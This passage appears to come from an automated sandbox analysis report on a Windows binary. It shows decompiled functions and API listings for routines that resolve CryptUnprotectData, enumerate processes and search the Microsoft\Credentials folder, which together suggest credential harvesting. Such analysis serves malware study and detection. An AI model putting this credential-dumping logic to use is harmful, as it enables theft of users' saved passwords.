                                0x00404cc7
                                0x00404cc9
                                0x00404cc9
                                0x00404cc7
                                0x00404cd4
                                0x00404cd6
                                0x00404cd6
                                0x00404cdf

                                APIs
                                  • Part of subcall function 00404CE0: FreeLibrary.KERNELBASE(?,00404CA5,00000000,00404771,?,?), ref: 00404CEB
                                • LoadLibraryA.KERNELBASE(crypt32.dll,00000000,00404771,?,?), ref: 00404CAA
                                • GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00404CBC
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Library$AddressFreeLoadProc
                                • String ID: CryptUnprotectData$crypt32.dll
                                • API String ID: 145871493-1827663648
                                • Opcode ID: 2e6b38e55e542b86b2f912df5b090dd7434b38e1ebb6106688e0ae1187d66704
                                • Instruction ID: 7870739769311804760c3d1e0253e2144152d34b250ce61cbbba51fe108a7f01
                                • Opcode Fuzzy Hash: 2e6b38e55e542b86b2f912df5b090dd7434b38e1ebb6106688e0ae1187d66704
                                • Instruction Fuzzy Hash: 01E012B06057108AE7205F76A9057837AD4AB84744F12843EA149E2580D7B8E440C798
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00411560, Relevance: 6.1, APIs: 4, Instructions: 98COMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 004115A1
                                • K32EnumProcesses.KERNEL32(?,00004000,004044A3,?,004044A3,?,00000000,00000000,00000000), ref: 004115B9
                                  • Part of subcall function 004112D9: OpenProcess.KERNEL32(00000410,00000000,?,?,00000000,?,?,?), ref: 004112FF
                                  • Part of subcall function 004112D9: K32EnumProcessModules.KERNEL32(00000000,?,00000004,?,?,?,?), ref: 00411316
                                  • Part of subcall function 004112D9: K32GetModuleFileNameExA.KERNEL32(00000000,?,?,00000104,?,?,?), ref: 0041132A
                                  • Part of subcall function 004112D9: FindCloseChangeNotification.KERNELBASE(00000000,?,?,?), ref: 00411336
                                  • Part of subcall function 00411172: _mbscpy.MSVCRT ref: 00411198
                                  • Part of subcall function 0041172B: memcpy.MSVCRT ref: 00411758
                                • _mbscpy.MSVCRT ref: 0041165E
                                • CloseHandle.KERNEL32(00000000,004044A3,?), ref: 00411697
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: CloseEnumProcess_mbscpy$ChangeFileFindHandleModuleModulesNameNotificationOpenProcessesmemcpymemset
                                • String ID:
                                • API String ID: 3551507631-0
                                • Opcode ID: 9809a1a83cd82cc29b60a12147b0f8e2d32acd45d844ff989c572edc4e4952da
                                • Instruction ID: 5e40a2ef1ff72a785ccc601064cd9551f1045985186162b7752f8c4c90acf24d
                                • Opcode Fuzzy Hash: 9809a1a83cd82cc29b60a12147b0f8e2d32acd45d844ff989c572edc4e4952da
                                • Instruction Fuzzy Hash: 72317271901129ABDB20EB65DC85BEE77BCEB44344F0440ABE709E2160D7759EC5CA68
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00411C8F, Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 00411CB8
                                  • Part of subcall function 00406F2D: sprintf.MSVCRT ref: 00406F65
                                  • Part of subcall function 00406F2D: memcpy.MSVCRT ref: 00406F78
                                • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00411CDC
                                • memset.MSVCRT ref: 00411CF4
                                • GetPrivateProfileStringA.KERNEL32(?,?,00417C88,?,00002000,?), ref: 00411D12
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                • String ID:
                                • API String ID: 3143880245-0
                                • Opcode ID: a1c05242f935a5891b0258ea82ebdb7f25e17ebbf36daa8a397953fffb7df0c4
                                • Instruction ID: 17bc1180ef60d6c0bde436c598d7e35c316bda315ace93708f1b6f060f7ed051
                                • Opcode Fuzzy Hash: a1c05242f935a5891b0258ea82ebdb7f25e17ebbf36daa8a397953fffb7df0c4
                                • Instruction Fuzzy Hash: 0611A771500219BFDF115F64EC8AEDB3F78EF04754F100066FA09A2151E6358964CBA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00404220, Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                Download Yara Rule
                                C-Code - Quality: 21%
                                			E00404220(void* __eflags, intOrPtr _a4, void* _a8) {
				signed int _v8;
				void* __ecx;
				void* __esi;
				void* _t17;
				void* _t18;
				void* _t19;
				signed int _t20;
				void* _t24;
				void* _t27;
				long _t31;
				void* _t34;

				_v8 = _v8 & 0x00000000;
				_t34 = E004067BA(_a8);
				_a8 = _t34;
				if(_t34 != 0xffffffff) {
					_t31 = GetFileSize(_t34, 0);
					_t5 = _t31 - 0x11; // -17
					if(_t5 <= 0xfffee) {
						_t6 = _t31 + 1; // 0x1
						_t17 = _t6;
						0x413d5c(); // executed
						_t27 = _t17;
						_t24 = _t17;
						_t18 = E00406ED6(_t27, 0, _t34, _t24, _t31); // executed
						if(_t18 != 0) {
							_t19 = E00406B3B();
							_t43 = _t19;
							if(_t19 == 0) {
								_push(_t31);
								_push(_t24);
							} else {
								_push(_t31 + 0xfffffff4);
								_t7 = _t24 + 0xc; // 0xc
							}
							_push(_a4);
							_t20 = E004049E6(_t43); // executed
							_v8 = _t20;
						}
						0x413d56(_t24);
					}
					CloseHandle(_a8);
				}
				return _v8;
			}














                                0x00404224
                                0x00404233
                                0x00404239
                                0x0040423c
                                0x00404247
                                0x00404249
                                0x00404251
                                0x00404253
                                0x00404253
                                0x00404257
                                0x0040425c
                                0x0040425d
                                0x00404264
                                0x0040426e
                                0x00404270
                                0x00404275
                                0x00404277
                                0x00404283
                                0x00404284
                                0x00404279
                                0x0040427c
                                0x0040427d
                                0x00404280
                                0x00404285
                                0x00404288
                                0x0040428d
                                0x0040428d
                                0x00404291
                                0x00404296
                                0x0040429a
                                0x0040429a
                                0x004042a7

                                APIs
                                  • Part of subcall function 004067BA: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00404233,?), ref: 004067CC
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00404241
                                • ??2@YAPAXI@Z.MSVCRT ref: 00404257
                                  • Part of subcall function 00406ED6: ReadFile.KERNELBASE(?,?,?,00000000,00000000,00000001,?,00404269,00000000,00000000,00000000), ref: 00406EED
                                • ??3@YAXPAX@Z.MSVCRT ref: 00404291
                                • CloseHandle.KERNEL32(?), ref: 0040429A
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: File$??2@??3@CloseCreateHandleReadSize
                                • String ID:
                                • API String ID: 1968906679-0
                                • Opcode ID: f8c6986dee829a369a6d7fc671dad0cd2f3c2bf524c5f015633fded4cebe1fc5
                                • Instruction ID: a1f592bc07a1c6bae19e5ae82b96cf667b255c71c14e9b40cb31a6e8a4c88875
                                • Opcode Fuzzy Hash: f8c6986dee829a369a6d7fc671dad0cd2f3c2bf524c5f015633fded4cebe1fc5
                                • Instruction Fuzzy Hash: F801A1B2501118BBD710AA65EC45EDF776CEB853B4F10823EFD15E62D0EB389E0086A8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041208B, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                Download Yara Rule
                                APIs
                                • FindResourceA.KERNEL32(?,?,?), ref: 00412098
                                • SizeofResource.KERNEL32(?,00000000), ref: 004120A9
                                • LoadResource.KERNEL32(?,00000000), ref: 004120B9
                                • LockResource.KERNEL32(00000000), ref: 004120C4
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Resource$FindLoadLockSizeof
                                • String ID:
                                • API String ID: 3473537107-0
                                • Opcode ID: f941057d9d473a3effe0424e98a75c568b709bef998aca64f808860bd509ea76
                                • Instruction ID: 6eee99af0fd3847aa000c15d4e464fa532876ff6069f3449b7718533803959f6
                                • Opcode Fuzzy Hash: f941057d9d473a3effe0424e98a75c568b709bef998aca64f808860bd509ea76
                                • Instruction Fuzzy Hash: 0101C432600215AB8B158F95DD489DB7F6AFF8A391305C036ED09C6360D770C890C6CC
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004112D9, Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                Download Yara Rule
                                APIs
                                • OpenProcess.KERNEL32(00000410,00000000,?,?,00000000,?,?,?), ref: 004112FF
                                • K32EnumProcessModules.KERNEL32(00000000,?,00000004,?,?,?,?), ref: 00411316
                                • K32GetModuleFileNameExA.KERNEL32(00000000,?,?,00000104,?,?,?), ref: 0041132A
                                • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?), ref: 00411336
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Process$ChangeCloseEnumFileFindModuleModulesNameNotificationOpen
                                • String ID:
                                • API String ID: 1149579341-0
                                • Opcode ID: 403ab780173edf7ca256d8a46e4ae22afbf76247b98eaff03a4cae4f07767835
                                • Instruction ID: d3b8bc427d879abbe067d139e4d8751d61c0b56586969d320d8ec49f77c75a5b
                                • Opcode Fuzzy Hash: 403ab780173edf7ca256d8a46e4ae22afbf76247b98eaff03a4cae4f07767835
                                • Instruction Fuzzy Hash: 0A01DF36200109BFFB105FA29D84AEBBBACEB44784B04003AFF12D05A0D779DC81822D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004140F2, Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ??3@
                                • String ID:
                                • API String ID: 613200358-0
                                • Opcode ID: 2878877b4fb96dd6387d393cb3696d7bef76af751c319c337b16d2b81faded20
                                • Instruction ID: 5397eece0a1688dd905253f83ef07836dc4e260be7ec153caf65aeba5f13d1a3
                                • Opcode Fuzzy Hash: 2878877b4fb96dd6387d393cb3696d7bef76af751c319c337b16d2b81faded20
                                • Instruction Fuzzy Hash: 82E04674308210269A24AF3BFE49AC723AC5B54725794852FF808D33A2CE2CCCC0802C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004086ED, Relevance: 5.0, APIs: 4, Instructions: 36COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ??2@
                                • String ID:
                                • API String ID: 1033339047-0
                                • Opcode ID: a4fa1e677cc50a3193f21f28cfe2e500cc07678549d552243c94e4c074398bac
                                • Instruction ID: 62cae8e83bd5d1efe0b7207de595a3d8a96caeb03304a295a8faf49e2a024305
                                • Opcode Fuzzy Hash: a4fa1e677cc50a3193f21f28cfe2e500cc07678549d552243c94e4c074398bac
                                • Instruction Fuzzy Hash: 58F04FB96012005EFB589F36ED4679576F0A708309F18C53EE9058B2F4EB7444448F1D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040D935, Relevance: 4.5, APIs: 3, Instructions: 46COMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E0040D935(intOrPtr* _a4) {
				long _v8;
				long _v12;
				char _v273;
				void _v275;
				char _v276;
				void* _t21;
				void* _t22;

				_v8 = 0;
				_v276 = 0;
				memset( &_v275, 0, 0x104);
				GetWindowsDirectoryA( &_v276, 0x104);
				_v273 = 0;
				GetVolumeInformationA( &_v276, 0, 0,  &_v8,  &_v12, 0, 0, 0); // executed
				_t21 = E0040D794(_a4, 0x80000002, _v8); // executed
				if(_t21 != 0) {
					_t22 = E0040D794(_a4, 0x80000001, _v8); // executed
					return _t22;
				}
				return _t21;
			}










                                0x0040d950
                                0x0040d953
                                0x0040d959
                                0x0040d969
                                0x0040d983
                                0x0040d989
                                0x0040d99a
                                0x0040d9a1
                                0x0040d9ae
                                0x00000000
                                0x0040d9ae
                                0x0040d9b6

                                APIs
                                • memset.MSVCRT ref: 0040D959
                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040D969
                                • GetVolumeInformationA.KERNELBASE(?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0040D989
                                  • Part of subcall function 0040D794: memset.MSVCRT ref: 0040D7DC
                                  • Part of subcall function 0040D794: RegCloseKey.ADVAPI32(00000008), ref: 0040D925
                                  • Part of subcall function 0040D794: RegQueryValueExA.ADVAPI32(?,MainLocation,00000000,?,?,?), ref: 0040D82B
                                  • Part of subcall function 0040D794: atoi.MSVCRT ref: 0040D840
                                  • Part of subcall function 0040D794: memset.MSVCRT ref: 0040D869
                                  • Part of subcall function 0040D794: _mbscpy.MSVCRT ref: 0040D8B3
                                  • Part of subcall function 0040D794: _mbscpy.MSVCRT ref: 0040D8C6
                                  • Part of subcall function 0040D794: RegCloseKey.ADVAPI32(?), ref: 0040D8FC
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memset$Close_mbscpy$DirectoryInformationQueryValueVolumeWindowsatoi
                                • String ID:
                                • API String ID: 2578913611-0
                                • Opcode ID: 5ad718d0a178176aa5508ab2a21a3f8c1d31e3488d15dce6a5d9606b6b3f0dca
                                • Instruction ID: 16f147aac1a6c23bf629e3733d081773eeb3eb261c5fc0fbd4ac26dcbb8d373b
                                • Opcode Fuzzy Hash: 5ad718d0a178176aa5508ab2a21a3f8c1d31e3488d15dce6a5d9606b6b3f0dca
                                • Instruction Fuzzy Hash: BB01ECB2C0011CFFDB11DAD4DD85EDEBBACAB08348F1444BAB609E2051D6744F989BA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00406982, Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                Download Yara Rule
                                C-Code - Quality: 58%
                                			E00406982(signed int* __eax, void* __edx, void** __edi, signed int _a4, intOrPtr _a8) {
				void* _t8;
				void* _t13;
				signed int _t16;
				void** _t21;
				signed int _t22;

				_t21 = __edi;
				_t22 =  *__eax;
				if(__edx < _t22) {
					return 0;
				} else {
					_t13 =  *__edi;
					do {
						 *__eax =  *__eax + _a8;
						_t16 =  *__eax;
					} while (__edx >= _t16);
					_t8 = malloc(_t16 * _a4); // executed
					 *__edi = _t8;
					if(_t22 > 0) {
						if(_t8 != 0) {
							memcpy(_t8, _t13, _t22 * _a4);
						}
						0x413de6(_t13);
					}
					return 0 |  *_t21 != 0x00000000;
				}
			}








                                0x00406982
                                0x00406983
                                0x00406987
                                0x004069d2
                                0x00406989
                                0x0040698a
                                0x0040698c
                                0x00406990
                                0x00406992
                                0x00406994
                                0x0040699e
                                0x004069a6
                                0x004069a8
                                0x004069ac
                                0x004069b6
                                0x004069bb
                                0x004069bf
                                0x004069c4
                                0x004069ce
                                0x004069ce

                                APIs
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ??3@mallocmemcpy
                                • String ID:
                                • API String ID: 3831604043-0
                                • Opcode ID: 43d69199a7eee8632861a0ca226f395938b4ef25a2d6add8601f3af2fa4d9b08
                                • Instruction ID: 3aa6f9377dfc5db36287fc2124ba6b3299db699d57604e2b41df5078e12f24d2
                                • Opcode Fuzzy Hash: 43d69199a7eee8632861a0ca226f395938b4ef25a2d6add8601f3af2fa4d9b08
                                • Instruction Fuzzy Hash: 22F02EF26082119FC7089F75B94149BB79DAF45324B12443FF405D3285D738DC64C7A8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00410383, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00406B06: GetVersionExA.KERNEL32(0041E160,?,00406B2F,0040261A), ref: 00406B20
                                • _mbscpy.MSVCRT ref: 004103C3
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Version_mbscpy
                                • String ID: CryptUnprotectData
                                • API String ID: 1856898028-1975210251
                                • Opcode ID: b937d2dc300c7c2f46df72a81b3b85809e99c29df1e88dcb10a6db808fd69e02
                                • Instruction ID: 124ef79401bdf720cf005998ce1259a6424ffa61298b62e05562ee11dac58942
                                • Opcode Fuzzy Hash: b937d2dc300c7c2f46df72a81b3b85809e99c29df1e88dcb10a6db808fd69e02
                                • Instruction Fuzzy Hash: D0F0A471A0030C9BCF04EBA9D589ADEBBB85F08318F11802FE910B6181D7B8D4C4CB2E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00406AE0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E00406AE0() {
				struct tagLOGFONTA _v64;
				struct HFONT__* _t6;

				E00406A19( &_v64, "Arial", 0xe, 0);
				_t6 = CreateFontIndirectA( &_v64); // executed
				return _t6;
			}





                                0x00406af2
                                0x00406afe
                                0x00406b05

                                APIs
                                  • Part of subcall function 00406A19: memset.MSVCRT ref: 00406A23
                                  • Part of subcall function 00406A19: _mbscpy.MSVCRT ref: 00406A63
                                • CreateFontIndirectA.GDI32(?), ref: 00406AFE
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: CreateFontIndirect_mbscpymemset
                                • String ID: Arial
                                • API String ID: 3853255127-493054409
                                • Opcode ID: 40c99e9d60d1ab3f835d0cb059d53835698da9c32ee7eac16eefe87b5741b715
                                • Instruction ID: e76317b4d314f44c8759e74956d0c4c6c36286f6473dc8017c9c1f452a7d8835
                                • Opcode Fuzzy Hash: 40c99e9d60d1ab3f835d0cb059d53835698da9c32ee7eac16eefe87b5741b715
                                • Instruction Fuzzy Hash: 25D0C970E4020C66D600B7A0FD07BC9776C5B40708F504025BA01B50E1EAE4E1188AD9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040C5A4, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 68COMMON
                                Download Yara Rule
                                C-Code - Quality: 82%
                                			E0040C5A4(void* __edi, void* __eflags) {
				void* __esi;
				signed int _t20;
				intOrPtr _t27;
				intOrPtr _t34;
				void* _t38;
				void* _t41;
				void* _t45;
				void* _t47;
				intOrPtr _t48;

				_t45 = __edi;
				_t34 = 0;
				E00403CB2( *((intOrPtr*)(__edi + 0x390)), __eflags, 0, 0);
				_t20 =  *((intOrPtr*)(__edi + 0x398));
				 *((intOrPtr*)(__edi + 0x108)) = 0;
				if( *((intOrPtr*)(_t20 + 0x30)) <= 0) {
					_t47 = 0x417c88;
				} else {
					if( *((intOrPtr*)(_t20 + 0x1c)) <= 0) {
						_t41 = 0;
						__eflags = 0;
					} else {
						_t41 =  *((intOrPtr*)( *((intOrPtr*)(_t20 + 0xc)))) +  *((intOrPtr*)(_t20 + 0x10));
					}
					_t47 = _t41;
				}
				0x413dce("/stext", _t47);
				if(_t20 != 0) {
					_t48 = E0040C50E(_t20, _t47);
					__eflags = _t48 - _t34;
					if(_t48 <= _t34) {
						goto L15;
					}
					goto L9;
				} else {
					_t48 = 1;
					L9:
					E0040BBF0(_t45, _t34); // executed
					E0040B2F5(_t45);
					_t27 =  *((intOrPtr*)(_t45 + 0x398));
					if( *((intOrPtr*)(_t27 + 0x30)) <= 1) {
						_t38 = 0x417c88;
					} else {
						_t55 =  *((intOrPtr*)(_t27 + 0x1c)) - 1;
						if( *((intOrPtr*)(_t27 + 0x1c)) <= 1) {
							_t38 = 0;
						} else {
							_t38 =  *((intOrPtr*)( *((intOrPtr*)(_t27 + 0xc)) + 4)) +  *((intOrPtr*)(_t27 + 0x10));
						}
					}
					 *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x390)) + 0x1bc)) =  *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x38c)) + 0x730));
					E0040A8F2( *((intOrPtr*)(_t45 + 0x390)),  *((intOrPtr*)(_t45 + 0x390)), _t45, _t55, _t38, _t48); // executed
					_t34 = 1;
					E0040BDCF(_t45);
					L15:
					return _t34;
				}
			}












                                0x0040c5a4
                                0x0040c5ac
                                0x0040c5b0
                                0x0040c5b5
                                0x0040c5bb
                                0x0040c5c4
                                0x0040c5db
                                0x0040c5c6
                                0x0040c5c9
                                0x0040c5d5
                                0x0040c5d5
                                0x0040c5cb
                                0x0040c5d0
                                0x0040c5d0
                                0x0040c5d7
                                0x0040c5d7
                                0x0040c5e6
                                0x0040c5ef
                                0x0040c5fb
                                0x0040c5fd
                                0x0040c5ff
                                0x00000000
                                0x00000000
                                0x00000000
                                0x0040c5f1
                                0x0040c5f3
                                0x0040c601
                                0x0040c604
                                0x0040c60b
                                0x0040c610
                                0x0040c61a
                                0x0040c631
                                0x0040c61c
                                0x0040c61c
                                0x0040c620
                                0x0040c62d
                                0x0040c622
                                0x0040c628
                                0x0040c628
                                0x0040c620
                                0x0040c649
                                0x0040c656
                                0x0040c65f
                                0x0040c660
                                0x0040c666
                                0x0040c669
                                0x0040c669

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: _strcmpi
                                • String ID: /stext
                                • API String ID: 1439213657-3817206916
                                • Opcode ID: 8485200a8f39a627e5aa607aa4fe0e6a3330f2b4b352017cc2d2cebf071a6028
                                • Instruction ID: 4d1f9c46abbdb5e83ce0205fdf3861872a59254e2367a1e2376026c6f9217911
                                • Opcode Fuzzy Hash: 8485200a8f39a627e5aa607aa4fe0e6a3330f2b4b352017cc2d2cebf071a6028
                                • Instruction Fuzzy Hash: D721A130614211EFC36C9F2988C1966B3A9BF05314B1556BFB40AA7382DB79EC519BC8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004042AA, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 67COMMON
                                Download Yara Rule
                                C-Code - Quality: 86%
                                			E004042AA(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v328;
				char _v652;
				char _v928;
				signed char _v972;
				char _v1296;
				signed int _v1300;
				void* __esi;
				void* _t33;
				char* _t34;
				void* _t38;
				void* _t41;
				intOrPtr _t44;
				void* _t45;

				_v1300 = _v1300 | 0xffffffff;
				_v1296 = 0;
				_v328 = 0;
				_v652 = 0;
				_t38 = __ecx;
				_t41 = 0;
				E0040783B( &_v1300, __eflags, _a4);
				if(E00407898( &_v1300) == 0) {
					L11:
					E00407930( &_v1300);
					return _t41;
				} else {
					_t44 = _a8;
					do {
						if((_v972 & 0x00000010) != 0) {
							__eflags = E00407800( &_v1300);
							if(__eflags != 0) {
								E004042AA(_t38, __eflags,  &_v652, _t44 + 1);
							}
							goto L10;
						}
						if(E00406B3B() != 0) {
							L6:
							_t33 = E00404220(_t51, _t38,  &_v652); // executed
							if(_t33 != 0) {
								_t41 = 1;
							}
							goto L10;
						}
						if(_t44 < 1) {
							goto L10;
						}
						_t34 =  &_v928;
						0x413d92(_t34, "credentials", 0xb);
						_t45 = _t45 + 0xc;
						_t51 = _t34;
						if(_t34 != 0) {
							goto L10;
						}
						goto L6;
						L10:
					} while (E00407898( &_v1300) != 0);
					goto L11;
				}
			}
















                                0x004042b3
                                0x004042c2
                                0x004042c8
                                0x004042ce
                                0x004042da
                                0x004042dc
                                0x004042de
                                0x004042f0
                                0x0040436c
                                0x00404372
                                0x0040437d
                                0x004042f2
                                0x004042f2
                                0x004042f5
                                0x004042fc
                                0x00404347
                                0x00404349
                                0x00404358
                                0x00404358
                                0x00000000
                                0x00404349
                                0x00404305
                                0x00404326
                                0x0040432e
                                0x00404335
                                0x00404339
                                0x00404339
                                0x00000000
                                0x00404335
                                0x0040430a
                                0x00000000
                                0x00000000
                                0x0040430e
                                0x0040431a
                                0x0040431f
                                0x00404322
                                0x00404324
                                0x00000000
                                0x00000000
                                0x00000000
                                0x0040435d
                                0x00404368
                                0x00000000
                                0x004042f5

                                APIs
                                  • Part of subcall function 0040783B: strlen.MSVCRT ref: 00407862
                                  • Part of subcall function 0040783B: strlen.MSVCRT ref: 0040786F
                                  • Part of subcall function 00407898: FindFirstFileA.KERNELBASE(00000103,00000247,?,?,004042EE,?), ref: 004078AE
                                  • Part of subcall function 00407898: strlen.MSVCRT ref: 004078FC
                                  • Part of subcall function 00407898: strlen.MSVCRT ref: 00407904
                                • _strnicmp.MSVCRT ref: 0040431A
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: strlen$FileFindFirst_strnicmp
                                • String ID: credentials
                                • API String ID: 773473087-4194641934
                                • Opcode ID: 5f078394bf2af8fae6ee7cd525e99526c652b3bab6a7d26c0a39e7232aba890c
                                • Instruction ID: 0f17e4e4efe03dbe37520bfce116898ea2601fe450b4b80a5694618c7f7ee9f5
                                • Opcode Fuzzy Hash: 5f078394bf2af8fae6ee7cd525e99526c652b3bab6a7d26c0a39e7232aba890c
                                • Instruction Fuzzy Hash: 4E21D872A0421C56DB60F6668C417DB77A85F81349F4460FBAE18F21C2EA78DF84CF55
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040E675, Relevance: 3.0, APIs: 2, Instructions: 48stringCOMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 0040E695
                                  • Part of subcall function 0040F9A0: CompareFileTime.KERNEL32(?,?,00000000,?,?,00000000), ref: 0040F9F1
                                • strrchr.MSVCRT ref: 0040E6B1
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: CompareFileTimememsetstrrchr
                                • String ID:
                                • API String ID: 4226234548-0
                                • Opcode ID: 2a82436f4faa6b05b2cc636fc97259d9a3810c45e056b17ce4a1fb11b0906514
                                • Instruction ID: 53b6c61b59caaa2062b149ee1151cefa66ffad82665aa7653a439d89524e8348
                                • Opcode Fuzzy Hash: 2a82436f4faa6b05b2cc636fc97259d9a3810c45e056b17ce4a1fb11b0906514
                                • Instruction Fuzzy Hash: F611BAB1C0522C9EDB21EF5A9C85AC9BBB8BB09304F9040FF9248F2241D7785B94CF95
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00404380, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 34COMMON
                                Download Yara Rule
                                C-Code - Quality: 75%
                                			E00404380(intOrPtr _a4, intOrPtr _a8) {
				void _v267;
				char _v268;
				void* __edi;
				void* __esi;
				int _t13;
				int _t17;

				_t17 = 0;
				_v268 = 0;
				memset( &_v267, 0, 0x104);
				_t16 =  &_v268;
				0x41223f(); // executed
				_t21 = _a8;
				if(_a8 != 0) {
					E0040680E( &_v268);
					E00406EFE(_t16, "Microsoft\Credentials");
					_t13 = E004042AA(_a4, _t21, _t16, 0); // executed
					_t17 = _t13;
				}
				return _t17;
			}









                                0x00404390
                                0x0040439a
                                0x004043a1
                                0x004043ac
                                0x004043b2
                                0x004043b7
                                0x004043b9
                                0x004043bd
                                0x004043c7
                                0x004043d5
                                0x004043da
                                0x004043da
                                0x004043e1

                                APIs
                                • memset.MSVCRT ref: 004043A1
                                  • Part of subcall function 0041223F: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000000,00000104), ref: 00412279
                                  • Part of subcall function 0040680E: strlen.MSVCRT ref: 0040680F
                                  • Part of subcall function 0040680E: _mbscat.MSVCRT ref: 00406826
                                  • Part of subcall function 00406EFE: strlen.MSVCRT ref: 00406F00
                                  • Part of subcall function 00406EFE: strlen.MSVCRT ref: 00406F0B
                                  • Part of subcall function 00406EFE: _mbscat.MSVCRT ref: 00406F22
                                  • Part of subcall function 004042AA: _strnicmp.MSVCRT ref: 0040431A
                                Strings
                                Memory Dump Source
